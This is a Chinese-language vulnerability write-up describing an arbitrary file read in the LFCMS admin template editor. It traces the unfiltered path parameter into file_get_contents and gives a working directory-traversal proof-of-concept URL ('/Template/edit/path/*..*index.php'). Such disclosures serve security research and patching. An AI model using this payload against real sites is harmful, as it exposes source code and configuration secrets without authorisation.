# LFCMS 后台任意文件读取漏洞
==========================
一、漏洞简介
————
二、漏洞影响
————
三、复现过程
————
漏洞起始点位于`/Application/Admin/Controller/TemplateController.class.php`中的`edit`方法,该方法用作后台模板编辑,关键代码如下![1.png](/static/qingy/LFCMS_后台任意文件读取漏洞/img/rId24.png)
我们传入的路径需要将`/`替换为`*`接着调用了`read`方法,跟进该方法
public function read($filename,$type=”){
return $this->get($filename,’content’,$type);
}
继续跟进get方法
public function get($filename,$name,$type=”) {
if(!isset($this->contents[$filename])) {
if(!is_file($filename)) return false;
$this->contents[$filename]=file_get_contents($filename);
}
$content=$this->contents[$filename];
$info = array(
‘mtime’ => filemtime($filename),
‘content’ => $content
);
return $info[$name];
}
}
该方法中返回了要读取的文件内容,可以看到在整个流程中没有对传入参数`path`的过滤,导致我们可以跨目录读文件,下面来验证一下,尝试读取一下跟目录`index.php`文件,测试链接如下
http://www.0-sec.org/admin.php?s=/Template/edit/path/*..*index.php
![2.png](/static/qingy/LFCMS_后台任意文件读取漏洞/img/rId25.png)
成功的读到了`CMS`的入口文件
参考链接
——–
> https://xz.aliyun.com/t/7844\#toc-4
请登录后查看评论内容